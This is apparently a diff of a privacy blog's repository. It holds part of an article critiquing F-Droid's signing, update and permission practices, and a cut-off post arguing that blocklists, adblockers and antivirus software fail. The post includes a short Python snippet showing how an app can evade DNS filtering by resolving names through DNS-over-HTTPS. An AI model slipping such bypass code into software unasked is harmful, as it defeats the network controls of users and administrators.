Google's approach is [code transparency for app bundles](https://developer.android.com/guide/app-bundle/code-transparency), which is a simple idea addressing some of the concerns with Play App Signing. A JSON Web Token (JWT) signed by a key private to the developer is included in the app bundle before its upload to Play Store. This token contains a list of DEX files and native `.so` libraries and their hashes, allowing end-users to verify that the running code was built and signed by the app developer. Code transparency has known limitations, however: not all resources can be verified, and this verification can only be done manually since it's not part of the Android platform itself (so requiring a code transparency file cannot be enforced by the OS right now). Despite its incompleteness, code transparency is still helpful, easy to implement, and thus something we should see more often as time goes by.
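
For what it's worth, a code transparency file can be verified manually with `bundletool`; a minimal sketch, assuming a recent bundletool version and a hypothetical `myCoolApp.aab` bundle whose developer opted into code transparency:

```
# Checks that the code transparency JWT inside the bundle is validly signed
# and matches the bundle's code; exact flags may differ between versions.
bundletool check-transparency --mode=bundle --bundle=myCoolApp.aab
```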

> What about other app repositories such as Amazon?

[To my current knowledge](https://developer.amazon.com/docs/app-submission/understanding-submission.html#code_wrapper), the Amazon Appstore has always been wrapping APKs with their own code (including their own trackers), which means they were effectively re-signing submitted APKs.

If you understood the information above correctly, Google can't do this for apps that haven't opted into Play App Signing. As for apps covered by Play App Signing, while Google could technically introduce their own code like Amazon does, they wouldn't do that without saying so, since it would be easily noticeable by the developer and, more globally, by researchers; they also have other means on the Android app development platform to do so. Believing they won't do that based on this principle is not a strong guarantee, however: hence the above paragraph about code transparency for app bundles.

Huawei AppGallery seems to have a [similar approach](https://developer.huawei.com/consumer/en/doc/distribution/app/20210812) to Google, where submitted apps could be developer-signed, but newer apps will be re-signed by Huawei.

## 2. Slow and irregular updates

Since you're adding one more party to the mix, that party is now responsible for delivering proper builds of the app: this is a common thing among traditional Linux distributions and their packaging systems. They have to catch up with *upstream* on a regular basis, but very few do it well (Arch Linux comes to mind). Others, like Debian, prefer making extensive *downstream* changes and delivering security fixes for a subset of vulnerabilities assigned to a CVE (yeah, it's as bad as it sounds, but that's another topic).

Not only does F-Droid require specific changes for the app to comply with its inclusion policy, which often leads to more maintenance work, it also has a rather strange way of triggering new builds. Part of its build process seems to be [automated](https://f-droid.org/en/docs/FAQ_-_App_Developers/), which is the least you could expect. Now here's the thing: app signing keys are on an **air-gapped server** (meaning it's disconnected from any network, at least that's what they claim: see [their recommendations](https://f-droid.org/docs/Building_a_Signing_Server/) for reference), which forces an irregular update cycle where a human has to manually trigger the signing process. This is far from an ideal situation, and you may argue it's the least to be expected, since entrusting all the signing keys to one party also introduces a single point of failure. Should their system be compromised (whether from the inside or the outside), this could lead to serious security issues affecting plenty of users.

*This is one of the main reasons why Signal refused to support the inclusion of a third-party build in the F-Droid official repository. While [this GitHub issue](https://github.com/signalapp/Signal-Android/issues/127) is quite old, many points still hold true today.*

Considering all this, and the fact that their build process is often broken and uses outdated tools, you have to expect **far slower updates** compared to a traditional distribution system. Slow updates mean that you will be exposed to security vulnerabilities more often than you should be. It would be unwise to have a full browser updated through the F-Droid official repository, for instance. F-Droid's third-party repositories somewhat mitigate the issue of slow updates, since they can be managed directly by the developer. It isn't ideal either, as you will see below.

## 3. Low target API level (SDK) for client & apps

SDK stands for *Software Development Kit* and is the collection of software used to build apps for a given platform. On Android, a higher SDK level means you'll be able to make use of modern API levels, of which each iteration brings **security and privacy improvements**. For instance, API level 31 makes use of all these improvements on Android 12.

As you may already know, Android has a strong sandboxing model where each application is sandboxed. You could say that an app compiled with the highest API level benefits from all the latest improvements brought to the app sandbox, as opposed to outdated apps compiled with older API levels, which have a **weaker sandbox**.

```
# b/35917228 - /proc/misc access
# This will go away in a future Android release
allow untrusted_app_25 proc_misc:file r_file_perms;

# Access to /proc/tty/drivers, to allow apps to determine if they
# are running in an emulated environment.
# b/33214085 b/33814662 b/33791054 b/33211769
# https://github.com/strazzere/anti-emulator/blob/master/AntiEmulator/src/diff/strazzere/anti/emulator/FindEmulator.java
# This will go away in a future Android release
allow untrusted_app_25 proc_tty_drivers:file r_file_perms;
```

This is a mere sample of the [SELinux exceptions](https://android.googlesource.com/platform/system/sepolicy/+/refs/tags/android-12.0.0_r21/private) that have to be made on older API levels, so that you can understand why it matters.

It turns out the official F-Droid client doesn't care much about this, since it lags behind quite a bit, **[targeting API level 25](https://gitlab.com/fdroid/fdroidclient/-/blob/2a8b16683a2dbee16d624a58e7dd3ea1da772fbd/app/build.gradle#L33)** (Android 7.1), for which some SELinux exceptions were shown above. As a workaround, some users recommended third-party clients such as [Foxy Droid](https://f-droid.org/en/packages/nya.kitsunyan.foxydroid/) or [Aurora Droid](https://f-droid.org/en/packages/com.aurora.adroid/). While these clients might be technically better, some of them are poorly maintained, and they also introduce yet another party to the mix. [Droid-ify](https://github.com/Iamlooker/Droid-ify) (recently rebranded to Neo-Store) seems to be a better option than the official client in most aspects.

Furthermore, F-Droid **doesn't enforce a minimum target SDK** for the official repository. Play Store [does that quite aggressively](https://developer.android.com/google/play/requirements/target-sdk) for new apps and app updates:

- Since August 2021, Play Store requires new apps to target at least API level 30.
- Since November 2021, existing apps must target at least API level 30 for updates to be submitted.

While it may seem bothersome, it's a necessity to keep the **app ecosystem modern and healthy**. Here, F-Droid sends the wrong message to developers (and even users) because they should care about it, and this is why many of us think it may even be harmful to the FOSS ecosystem. Backward compatibility is often the enemy of security, and while there's a middle ground between convenience and obsolescence, it shouldn't be exaggerated. As a result of this philosophy, the main repository of F-Droid is filled with obsolete apps from another era, just so these apps can run on the more than ten-year-old Android 4.0 Ice Cream Sandwich. Let's not make the same mistake as the desktop platforms: instead, complain to your vendors for selling devices with no decent OS/firmware support.

There is little practical reason for developers not to increase the target SDK version (`targetSdkVersion`) along with each Android release. This attribute matches the version of the platform an app is targeting, and allows access to modern improvements, rules and features on a modern OS. The app can still ensure backward compatibility in such a way that it can run on older platforms: the `minSdkVersion` attribute informs the system about the minimum API level required for the application to run. Setting it too low isn't practical though, because this requires having a lot of fallback code (most of it is handled by common libraries) and separate code paths.
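
To make the two attributes concrete, here is a minimal sketch with illustrative values (modern projects typically set these in their Gradle configuration rather than directly in the manifest):

```xml
<!-- AndroidManifest.xml fragment (illustrative values) -->
<!-- Runs on Android 7.0+ (API 24) while opting into the modern rules
     and restrictions of Android 12 (API 31). -->
<uses-sdk android:minSdkVersion="24" android:targetSdkVersion="31" />
```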

At the time of writing:

- Android 9 is the oldest Android version that is [getting security updates](https://endoflife.date/android).
- [~80% of the Android devices](https://developer.android.com/about/dashboards) used in the world are **at least** running 8.0 Oreo.

*Overall statistics do not reflect real-world usage of a given app (people using old devices are not necessarily using your app). If anything, they should be viewed as an underestimation.*

## 4. General lack of good practices

The F-Droid client allows multiple repositories to coexist within the same app. Many of the issues highlighted above were focused on the main official repository, which most F-Droid users will use anyway. However, having **other repositories in a single app also violates the security model of Android**, which was not designed for this at all. The OS expects you to trust **an app repository as a single source** of apps, yet F-Droid isn't that by design, as it mixes several repositories in one single app. This is important because the OS management APIs and features (such as [UserManager](https://developer.android.com/reference/android/os/UserManager), which can be used to prevent a user from installing third-party apps) are not meant for this and see F-Droid as a single source, so you're trusting the app client not to mess up far more than you should, especially when the **privileged extension** comes into the picture.

There is indeed a serious security issue with the OS first-party source feature being misused, as the privileged extension makes use of the `INSTALL_PACKAGES` [API](https://developer.android.com/reference/android/Manifest.permission#INSTALL_PACKAGES) in an insecure manner (i.e. not implementing it with the appropriate security checks). The privileged extension accepts any request from F-Droid, which again suffers from various bugs and security issues and allows user-defined repositories by design. A lot can go wrong, and bypassing security checks for powerful APIs should definitely not be taken lightly.

On that note, it is also worth noting that the repository metadata format isn't properly signed, lacking whole-file signing and key rotation. [Their index v1](https://f-droid.org/2021/02/05/apis-for-all-the-things.html#the-repo-index) format [uses JAR signing](https://gitlab.com/fdroid/fdroidserver/-/blob/3182b77d180b2313f4fdb101af96c035380abfd7/fdroidserver/signindex.py) with `jarsigner`, which has serious security flaws. It seems that [work is in progress on a v2 format](https://gitlab.com/fdroid/fdroidserver/-/commit/3182b77d180b2313f4fdb101af96c035380abfd7) with support for `apksigner`, although the final implementation remains to be seen. This just seems to be an over-engineered and flawed approach, since better-suited tools such as `signify` could be used to sign the metadata JSON.

As a matter of fact, the [new unattended update API](https://developer.android.com/reference/android/Manifest.permission#UPDATE_PACKAGES_WITHOUT_USER_ACTION) added in API level 31 (Android 12), which allows seamless app updates for app repositories without [privileged access](https://f-droid.org/en/packages/org.fdroid.fdroid.privileged/) to the system (such an approach is not compatible with the security model), won't work with F-Droid "as is". It should be mentioned that the aforementioned third-party client [Neo-Store](https://github.com/Iamlooker/Droid-ify/issues/20) supports this API, although the underlying issues with the F-Droid infrastructure largely remain. Indeed, this secure API allowing unprivileged unattended updates not only requires the app repository client to target API level 31, but the apps to be updated also have to target at least API level 29.

Their client also lacks **TLS certificate pinning**, unlike Play Store, which improves security for all connections to Google (they generally use a limited set of root CAs, including [their own](https://pki.goog/)). Certificate pinning is a way for apps to increase the security of their connection to services [by providing a set of public key hashes](https://developer.android.com/training/articles/security-config#CertificatePinning) of known-good certificates for these services instead of trusting pre-installed CAs. This can avoid some cases where an interception (*man-in-the-middle* attack) could be possible and lead to various security issues, considering you're trusting the app to deliver you other apps.

It is an important security feature that is also straightforward to implement using the [declarative network security configuration](https://developer.android.com/training/articles/security-config) available since Android 7.0 (API level 24). See how GrapheneOS pins both root and CA certificates in their [app repository client](https://github.com/GrapheneOS/Apps):

```xml
<!-- res/xml/network_security_config.xml -->
<network-security-config>
    <base-config cleartextTrafficPermitted="false"/>
    <domain-config>
        <domain includeSubdomains="true">apps.grapheneos.org</domain>
        <pin-set>
            <!-- ISRG Root X1 -->
            <pin digest="SHA-256">C5+lpZ7tcVwmwQIMcRtPbsQtWLABXhQzejna0wHFr8M=</pin>
            <!-- ISRG Root X2 -->
            <pin digest="SHA-256">diGVwiVYbubAI3RW4hB9xU8e/CH2GnkuvVFZE8zmgzI=</pin>
            <!-- Let's Encrypt R3 -->
            <pin digest="SHA-256">jQJTbIh0grw0/1TkHSumWb+Fs0Ggogr621gT3PvPKG0=</pin>
            <!-- Let's Encrypt E1 -->
            <pin digest="SHA-256">J2/oqMTsdhFWW/n85tys6b4yDBtb6idZayIEBx7QTxA=</pin>
            ...
        </pin-set>
    </domain-config>
</network-security-config>
```

To be fair, they've thought several times about adding certificate pinning to their client, [at least for the default repositories](https://gitlab.com/fdroid/fdroidclient/-/issues/105). [Relics of preliminary work](https://gitlab.com/fdroid/fdroidclient/-/blob/1.14-alpha4/app/src/main/java/org/fdroid/fdroid/FDroidCertPins.java) can even be found in their current codebase, but it's unfortunate that they haven't been able to find [any working implementation](https://github.com/f-droid/fdroidclient/commit/7f78b46664981b9b73cadbfdda6391f6fe939c77) so far. Given the overly complex nature of F-Droid, that's largely understandable.

F-Droid also has a problem with the adoption of **[new signature schemes](https://source.android.com/security/apksigning)**, as they [held out on the v1 signature scheme](https://forum.f-droid.org/t/why-f-droid-is-still-using-apk-signature-scheme-v1/10602) (which was [horrible](https://www.xda-developers.com/janus-vulnerability-android-apps/) and deprecated since 2017) until they were forced by Android 11 requirements to support the newer v2/v3 schemes (v2 was introduced in Android 7.0). Quite frankly, this is straight-up bad, and **signing APKs with GPG** is no better, considering [how bad PGP and its reference implementation GPG are](https://latacora.micro.blog/2019/07/16/the-pgp-problem.html) (even Debian [is trying to move away from it](https://wiki.debian.org/Teams/Apt/Spec/AptSign)). Ideally, F-Droid should fully move on to newer signature schemes, and should completely phase out the legacy signature schemes which are still being used for some apps and metadata.
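
As an aside, `apksigner` from the Android build tools shows which schemes an APK verifies against; the output below is a sketch for a hypothetical app, trimmed to the relevant lines:

```
$ apksigner verify --verbose myCoolApp.apk
Verifies
Verified using v1 scheme (JAR signing): false
Verified using v2 scheme (APK Signature Scheme v2): true
Verified using v3 scheme (APK Signature Scheme v3): true
```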

## 5. Confusing UX

It is worth mentioning that their website has (for some reason) always been hosting an [outdated APK of F-Droid](https://forum.f-droid.org/t/why-does-the-f-droid-website-nearly-always-host-an-outdated-f-droid-apk/6234), and this is still the case today, leading to many users wondering why they can't install F-Droid on their secondary user profile (due to the downgrade prevention enforced by Android). "Stability" seems to be the main reason mentioned on their part, which doesn't make sense: either your version isn't ready to be published in a stable channel, or it is and new users should be able to access it easily.

F-Droid should enforce the approach of prefixing the package name of their alternate builds with `org.f-droid`, for instance (or add a `.fdroid` suffix, as some already have). Building and signing while **reusing the package name** ([application ID](https://developer.android.com/studio/build/configure-app-module)) is bad practice, as it causes **signature verification errors** when some users try to update/install these apps from other sources, even directly from the developer. That is again due to the security model of Android, which enforces a signature check when installing app updates (or installing them again in a secondary user profile). Note that this is going to be an issue with Play App Signing as well, and developers are encouraged to follow this approach should they intend to distribute their apps through different distribution channels.

This results in a confusing user experience where it's hard to keep track of who signs each app, and from which repository the app should be downloaded or updated.

## 6. Misleading permissions approach

F-Droid shows a list of the [low-level permissions](https://developer.android.com/reference/android/Manifest.permission) for each app: these low-level permissions are usually grouped into the standard high-level permissions (Location, Microphone, Camera, etc.) and special toggles (nearby Wi-Fi networks, Bluetooth devices, etc.) that are explicitly based on a type of sensitive data. While showing a list of low-level permissions could be useful information for a developer, it's often a **misleading** and inaccurate approach for the end-user. Since Android 6, apps have to [request the standard permissions at runtime](https://developer.android.com/guide/topics/permissions/overview#runtime) and do not get them simply by being installed, so showing all the "under the hood" permissions without proper context is not useful and makes the permission model unnecessarily confusing.

F-Droid claims that these low-level permissions are relevant because they support Android 5.1+, meaning they support very outdated versions of Android where apps could have [install-time permissions](https://source.android.com/devices/tech/config/runtime_perms). Anyway, if a technical user wants to see all the manifest permissions for some reason, they can access the app manifest pretty easily (in fact, exposing the raw manifest would be less misleading). But this is already beyond the scope of this article, because anyone who cares about privacy and security wouldn't run an 8-year-old version of Android that has not received security updates for years.

*To clear up confusion: even apps targeting an API level below 23 (Android 5.1 or older) do not have permissions granted at install time on modern Android, which instead displays a legacy permission grant dialog. Whether or not permissions are granted at install time does not just depend on the app's `targetSdkVersion`. And even if this were the case, the OS package installer on modern Android would have been designed to show the requested permissions for those legacy apps.*

For example, the low-level permission `RECEIVE_BOOT_COMPLETED` is referred to in F-Droid with the *run at startup* description, when in fact this permission is not needed to start at boot: it just refers to a specific broadcast sent by the system once it finishes booting, and is not about background usage (though power usage may be a valid concern). To be fair, these short summaries used to be provided by the Android documentation years ago, but the permission model has drastically evolved since then and most of them aren't accurate anymore.

> *Allows the app to have itself started as soon as the system has finished booting. This can make it take longer to start the phone and allow the app to slow down the overall phone by always running.*
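
For reference, receiving that broadcast requires an explicit declaration in the app's manifest; a minimal sketch (receiver name hypothetical) looks like this, and nothing about it keeps the app permanently running:

```xml
<!-- AndroidManifest.xml fragment -->
<uses-permission android:name="android.permission.RECEIVE_BOOT_COMPLETED" />

<receiver android:name=".BootReceiver" android:exported="false">
    <intent-filter>
        <!-- Delivered once after the system finishes booting. -->
        <action android:name="android.intent.action.BOOT_COMPLETED" />
    </intent-filter>
</receiver>
```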

In modern Android, the background restriction toggle is what really provides the ability for apps to run in the background. Some low-level permissions don't even have a security/privacy impact and shouldn't be misinterpreted as having one. Anyhow, you can be sure that each dangerous low-level permission has a **high-level representation** that is **disabled by default** and needs to be **granted dynamically** to the app (by a toggle or explicit user consent in general).

Another example illustrating the shortcomings of this approach would be the `QUERY_ALL_PACKAGES` low-level permission, which is referred to as the *query all packages* permission that "allows an app to see all installed packages". While this is somewhat correct, it can also be misleading: apps do not need `QUERY_ALL_PACKAGES` to list other apps within the same user profile. Even without this permission, some apps are visible automatically (visibility is restricted by default [since Android 11](https://developer.android.com/training/package-visibility)). If an app needs more visibility, it will declare a `<queries>` element in its manifest file: in other words, `QUERY_ALL_PACKAGES` is only one way to achieve visibility. Again, this goes to show that low-level manifest permissions are not intended to be interpreted as high-level permissions the user should fully comprehend.
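
As a sketch (package name hypothetical), such a declaration gives an app visibility into specific packages without ever requesting `QUERY_ALL_PACKAGES`:

```xml
<!-- AndroidManifest.xml fragment -->
<queries>
    <!-- Visibility into one specific app... -->
    <package android:name="org.example.companion" />
    <!-- ...or into any app that can handle a given intent. -->
    <intent>
        <action android:name="android.intent.action.SEND" />
        <data android:mimeType="image/jpeg" />
    </intent>
</queries>
```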

Play Store, for instance, conveys the permissions in a far less misleading way: the main low-level permissions are first grouped into their high-level user-facing toggles, and the rest is shown under "Other". This permission list can only be accessed by tapping "About this app" then "App permissions - See more" at the bottom of the page. Play Store will tell you that the app *may request access* to the following permissions; this kind of wording is more important than it seems. *Update: since July 2022, Play Store doesn't offer a way to display low-level permissions anymore.*

Moreover, [Play Store restricts the use of highly invasive permissions](https://support.google.com/googleplay/android-developer/answer/9888170) such as `MANAGE_EXTERNAL_STORAGE`, which allows apps to opt out of scoped storage if they can't work with [more privacy-friendly approaches](https://developer.android.com/guide/topics/providers/document-provider) (like a file explorer). Apps that can't justify their use of this permission (which again has to be granted dynamically) may be removed from Play Store. This is where an app repository can actually be useful in its review process to protect end-users from installing poorly made apps that might compromise their privacy. Not that it matters much if these apps target very old API levels that are inclined to require invasive permissions in the first place...

## Conclusion: what should you do?

So far, you have been presented with referenced facts that are easily verifiable. In the next part, I'll allow myself to express my own thoughts and opinions. You're free to disagree with them, but don't let that overshadow the rest.

While some improvements could easily be made, I don't think F-Droid is in an ideal situation to solve all of these issues, because some of them are **inherent flaws** in its architecture. I'd also argue that their core philosophy is not aligned with some security principles expressed in this article. In any case, I can only wish for them to improve, since they're one of the most popular alternatives to commercial app repositories, and are therefore trusted by a large userbase.

F-Droid is often seen as the only way to get and support open-source apps: that is not the case. Sure, F-Droid could help you find FOSS apps that you wouldn't otherwise have known existed. Many developers also publish their FOSS apps on the **Play Store** or on their website directly. Most of the time, releases are available on **GitHub**, which is great since each GitHub releases page has an Atom feed. If downloading APKs from regular websites, you can use `apksigner` to validate their authenticity by comparing the certificate fingerprint against the fingerprint from another source (it wouldn't matter otherwise).

This is how you may proceed to get the app certificate:

```
apksigner verify --print-certs --verbose myCoolApp.apk
```
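
The certificate lines in the output look roughly like the following (values made up and truncated); the SHA-256 digest is what you'd compare against the fingerprint published through another channel:

```
Signer #1 certificate DN: CN=Example Developer
Signer #1 certificate SHA-256 digest: 4f2c9a...
```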

Also, as written above: the OS pins the app signature (for all profiles) upon installation, and enforces a signature check for app updates. In practice, this means the source doesn't matter as much after the initial installation.

For most people, I'd recommend just **sticking with Play Store**. Play Store isn't quite flawless, but it emphasises the adoption of modern security standards, which in turn encourages better privacy practices; as strange as it may sound, Google is not always doing bad things in that regard.

*Note: this article obviously can't address all the flaws related to Play Store itself. Again, the main topic of this article is F-Droid, and it should not be seen as an exhaustive comparison between different app repositories.*

> Should I really care?

**It's up to your threat model**, and of course your personal preferences. Most likely, your phone won't turn into a nuclear weapon if you install F-Droid on it - and this is far from the point that this article is trying to make. Still, I believe the information presented will be valuable for anyone who values a **practical approach to privacy** (rather than an ideological one). Such an approach is partially described below.

> But there is more malware in Play Store! How can you say that it's more secure?

As explained above, it doesn't matter, as you shouldn't really rely on any quality control to be the sole guarantee that software is free of malicious or exploitable code. Play Store and even the Apple App Store may have a considerable amount of malware, because a full reverse-engineering of every uploaded app isn't realistically feasible. However, they fulfill their role quite well, and that is all that is expected of them.

> With Play App Signing being effectively enforced for new apps, isn't Play Store as "flawed" as F-Droid?

I've seen this comment repeatedly, and it would be dismissing all the other points made in this article. Also, I strongly suggest that you carefully read the sections related to Play App Signing, and preferably the official documentation on this matter. It's not a black and white question, and there are many more nuances to it.

> Aren't open-source apps more secure? Doesn't that make F-Droid safer?

You can still find and get your open-source apps elsewhere. And no, open-source apps [aren't necessarily more private or secure](https://seirdy.one/2022/02/02/floss-security.html). Instead, you should rely on the strong security and privacy guarantees provided by a modern operating system with **a robust sandboxing/permission model**, namely modern Android, GrapheneOS and iOS. Pay close attention to the permissions you grant, and avoid legacy apps, as they could require invasive permissions to run.

When it comes to *trackers* (this really comes up a lot), you shouldn't believe in the flawed idea that you can enumerate all of them. The *enumerating badness* approach is [known to be flawed in the security field](https://www.ranum.com/security/computer_security/editorials/dumb/), and the same applies to privacy. You shouldn't believe that a random script can detect every single line of code that can be used for data exfiltration. Data exfiltration can be properly prevented in the first place by the permission model, which again **denies access to sensitive data by default**: this is a simple, yet rigorous and effective approach.

No app should be unnecessarily entrusted with any kind of permission. It is only if you deem it necessary that you should allow access to a type of data, and this access should be as fine-grained as possible. That's the way the Android platform works (regular apps run in the explicit `untrusted_app` domain) and continues evolving. Contrary to some popular beliefs, usability and most productivity tasks can still be achieved in a secure and private way.

> Isn't Google evil? Isn't Play Store spyware?

Some people tend to exaggerate the importance of Google in their threat model, at the cost of pragmatism and security/privacy good practices. Play Store isn't spyware and can run unprivileged like it does on GrapheneOS (including with unattended updates support). On the vast majority of devices though, Google Play is a privileged app and a core part of the OS that provides low-level system modules. In that case, the trust issues involved with Play App Signing could be considered less important, since Google Play is already trusted as a privileged component.

**Play Store evidently has some privacy issues** given it's a proprietary service which requires an account (this cannot be circumvented), and Google services have a history of nagging users to enable privacy-invasive features. Again, some of these privacy issues can be mitigated by setting up the [Play services compatibility layer from GrapheneOS](https://grapheneos.org/usage#sandboxed-google-play), which runs Play services and Play Store in the regular app sandbox (the `untrusted_app` domain). [ProtonAOSP also shares that feature](https://protonaosp.org/features#privacy-and-security). This solution could very well be ported to other Android-based operating systems. If you want to go further, consider using a properly configured account with the least amount of personally identifiable information possible (note that the phone number requirement appears to be region-dependent).

If you don't have Play services installed, you can use a third-party Play Store client called **[Aurora Store](https://auroraoss.com/)**. Aurora Store has some issues of its own, and some of them in fact overlap with F-Droid's. Aurora Store somehow still requires [the legacy storage permission](https://gitlab.com/AuroraOSS/AuroraStore/-/blob/26f5d4fd558263a89baee4c3cbe1d220913da104/app/src/main/AndroidManifest.xml#L28-32), has yet to [implement certificate pinning](https://gitlab.com/AuroraOSS/AuroraStore/-/issues/697), has been known to sometimes retrieve wrong versions of apps, and [distributed account tokens](https://gitlab.com/AuroraOSS/AuroraStore/-/issues/722) over [cleartext HTTP](https://gitlab.com/AuroraOSS/AuroraStore/-/issues/734) until fairly recently; not that it matters much, since tokens were designed to be shared between users, which is already concerning. I'd recommend against using the shared "anonymous" accounts feature: you should make your own throwaway account with minimal information.

You should also keep an eye on the great work **GrapheneOS** does on [their future app repository](https://github.com/GrapheneOS/Apps). It will be a simple, secure, modern app repository for a curated list of high-quality apps, some of which will have their own builds (for instance, Signal still uses their [original 1024-bit RSA key](https://github.com/signalapp/Signal-Android/issues/9362) that has never been rotated). Inspired by this work, a GrapheneOS community member is developing a more generic app repository called [Accrescent](https://accrescent.app/). Hopefully, we'll see well-made alternatives like these flourish.

*Thanks to the GrapheneOS community for proofreading this article. Bear in mind that these are not official recommendations from the GrapheneOS project.*

*Post-publication note: it's unfortunate that the release of this article mostly triggered a negative response from the F-Droid team, which has preferred to dismiss this article on several occasions rather than bringing relevant counterpoints. Some of their core members are also involved in a harassment campaign against projects and security researchers that do not share their views. While this article remains a technical one, there are definitely ethical concerns to take into consideration.*

7
content/posts/android/_index.md
Normal file

@ -0,0 +1,7 @@
---
title: Android
ShowReadingTime: false
ShowWordCount: false
---

A collection of posts about Android and related applications.

51
content/posts/knowledge/Badness Enumeration.md
Normal file

@ -0,0 +1,51 @@
---
title: "Badness Enumeration"
date: 2022-07-27
tags: ['Knowledge base', 'Privacy', 'Security']
author: Tommy
---

Badness enumeration is the concept of making a list of known bad actors and attempting to block them. While it seems intuitive at first glance, badness enumeration should not be relied on for privacy or security. In many cases, it actually does the exact opposite and directly harms the user. This post will attempt to explain why badness enumeration as a concept is flawed and give *some* examples of its failings in practice.

## The Obvious Problem

The obvious argument against badness enumeration is that there are so many threat actors out there that it is impossible to make a list blocking all of them. Even if you made a magical list that somehow included every threat actor in existence today, tomorrow a new threat actor would pop up and attack you anyway. Enumerating badness does not systematically solve the underlying problem. Instead, it is running away from the problem and hoping that a competent adversary will not come after you. Badness enumeration does not work, cannot work, has never worked, and will never work.

## Adblocking Extensions

On top of the [obvious problem](#the-obvious-problem) mentioned above, there are various technical reasons why advertisement/tracker blocking extensions cannot provide privacy. One of them is the fact that tracking can be done without any scripts at all. For example, a website only needs to know your session ID using a cookie and save all logs associated with that ID. It can then analyze when you visited the website, how long you visited it for, which page on the website you spent the most time on, what you looked at, and so on. Another problem is that a website can just host its own tracking code or [proxy third-party tracking code under its own domain](https://gist.github.com/paivaric/211ca15afd48c5686226f5f747539e8b). Just because your adblocker blocks connections to Google Analytics does not mean that you are actually "safe" from Google Analytics at all. Even if you are successful in doing so, there is nothing stopping the website from sharing the analytics data it collected on its own with Google either.
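
To make this concrete, here is a sketch of script-less, first-party tracking at the HTTP level (header values made up):

```
# The first response sets an opaque session cookie - no JavaScript involved:
HTTP/1.1 200 OK
Set-Cookie: sid=3c1f9a7e; HttpOnly; Secure

# Every subsequent request sends it back, so the server alone can log which
# pages this visitor opened, when, and for how long:
GET /pricing HTTP/1.1
Cookie: sid=3c1f9a7e
```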

"Okay, so adblockers are unreliable, but what is the harm?" you may ask.

The problem here is that adblockers (especially with Manifest V2) are highly privileged and have access to all of your data within the browser. All it takes is for the extension developer to turn malicious for your passwords, session IDs, TOTP secrets, etc. to be compromised. Even if you were to assume that the extension developer is trustworthy, one vulnerability within the extension could still be catastrophic. This is made worse by the fact that adblockers typically use third-party blocklists, extending trust to the blocklist maintainers not to exploit the extension should a vulnerability be found. The ["uBlock, I exfiltrate"](https://portswigger.net/research/ublock-i-exfiltrate-exploiting-ad-blockers-with-css) blog post describes in detail how a CSS injection vulnerability in uBlock Origin led to data exfiltration via a single bad filtering rule.

Overall, adblockers increase your attack surface for dubious privacy benefits. If you insist on using an adblocker, I highly recommend a purely declarative, permissionless Manifest V3 one like [uBlock Origin Lite](https://chrome.google.com/webstore/detail/ublock-origin-lite/ddkjiahejlhfcafbddmgiahcphecmpfh). While these block fewer ads and trackers than their Manifest V2 counterparts or V3 extensions with the "Read and change all your data on all websites" permission, they pose much less of a threat to your privacy and security while still providing the convenience of blocking annoyances.

## DNS Filtering

DNS filtering solutions, while not having any negative impact on security, are trivially bypassable by hosting the advertisements and trackers under the apex domain instead of a subdomain. For example, instead of hosting advertisements and trackers under ads.example.com, the webmaster can move them under example.com/ads, which would be impossible for DNS filters to block. Other bypasses include an application implementing its own DNS resolution instead of relying on the DNS servers set by the operating system, or connecting directly to certain IP addresses without any DNS resolution at all.
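
As a sketch of that last bypass, an application can resolve names itself over DNS-over-HTTPS (here via Cloudflare's public JSON API; the blocked hostname is hypothetical) and connect directly, so the filtering resolver configured in the operating system never sees the query:

```
import json
import socket
import urllib.request

def resolve_via_doh(name: str) -> str:
    # Ask a public DoH resolver directly over HTTPS; the OS-configured
    # (filtering) DNS server is never consulted.
    url = f"https://cloudflare-dns.com/dns-query?name={name}&type=A"
    request = urllib.request.Request(url, headers={"Accept": "application/dns-json"})
    with urllib.request.urlopen(request) as response:
        answer = json.load(response)["Answer"]
    return answer[0]["data"]  # first A record

ip = resolve_via_doh("tracker.example.com")  # hypothetical blocked domain
conn = socket.create_connection((ip, 443))   # connects despite the DNS filter
```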

It should also be noted that websites can detect which DNS servers a visitor uses. You can look at [DNSLeakTest](https://www.dnsleaktest.com/) as an example. Using non-network-provided DNS servers adds to your fingerprint and makes you more identifiable.

The best way to do DNS filtering is to use a VPN provider which has this feature built in, like [ProtonVPN](https://protonvpn.com), [Mullvad](https://mullvad.net), or [IVPN](https://www.ivpn.net/), in order to not stand out from other users of the same VPN provider. Even then, DNS filtering is purely a convenience feature and cannot be relied on for privacy and security.

## Antiviruses

Antiviruses are highly privileged processes with access to virtually all of your files and data, parsing through them trying to find something that matches a known bad signature. Beyond the fact that you need to trust the antivirus company not to exfiltrate your sensitive data and that the signature list will never include all of the malware in existence, a vulnerable parser could lead to a system compromise. The [Abusing File Processing in Malware Detectors for Fun and Profit](/researches/Abusing-File-Processing-in-Malware-Detectors-for-Fun-and-Profit.pdf) research paper by Suman Jana and Vitaly Shmatikov discusses this in detail.

Here are some other examples of antiviruses being attack surfaces on their own:

- [Arbitrary Code Execution with Avast's JavaScript Interpreter](https://github.com/taviso/avscript)
- [Memory Corruption with Bitdefender](https://landave.io/2020/11/bitdefender-upx-unpacking-featuring-ten-memory-corruptions/)
- [Kaspersky in the Middle](https://web.archive.org/web/20210729054039/https://palant.info/2019/08/19/kaspersky-in-the-middle-what-could-possibly-go-wrong/)

The proper way to deal with untrusted applications is not to scan them with an antivirus, but to confine them in such a way that even if they were malicious, they could not do much damage at all. This has already been achieved on secure mobile operating systems like Android and iOS with their application sandboxes. Typically, attacks against these systems require an exploit chain against the operating system, or for the user to actually mess up and grant an app access to sensitive data. On desktop operating systems, you should utilize virtualization to contain untrusted applications in their own virtual machine. This can be done with a system like Qubes OS, the [Windows Sandbox](https://docs.microsoft.com/en-us/windows/security/threat-protection/windows-sandbox/windows-sandbox-overview), or just general KVM/Hyper-V virtual machines.

## Default Permit

Surprisingly (or unsurprisingly), [The Six Dumbest Ideas in Computer Security](https://www.ranum.com/security/computer_security/editorials/dumb/), an article from almost 20 years ago, still holds true today. It explains the problem with Default Permit better than I ever could. In short, when setting up a firewall or some sort of filter list, it is better to start out by blocking everything, then allowing only the traffic that you need. That way, you don't have to worry about applications that you didn't care enough to block turning out to be vulnerable. Sometimes, "goodness enumeration" is the solution to the problem.
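
As a toy illustration of the difference (the port numbers are made up), compare a default-deny filter with a default-permit one:

```
ALLOWED_PORTS = {22, 80, 443}  # goodness enumeration: short and auditable

def default_deny(port: int) -> bool:
    # Anything not explicitly allowed is blocked, including the service
    # you forgot you were even running.
    return port in ALLOWED_PORTS

BLOCKED_PORTS = {23, 135, 445}  # badness enumeration: necessarily incomplete

def default_permit(port: int) -> bool:
    # Anything not explicitly blocked gets through; one overlooked
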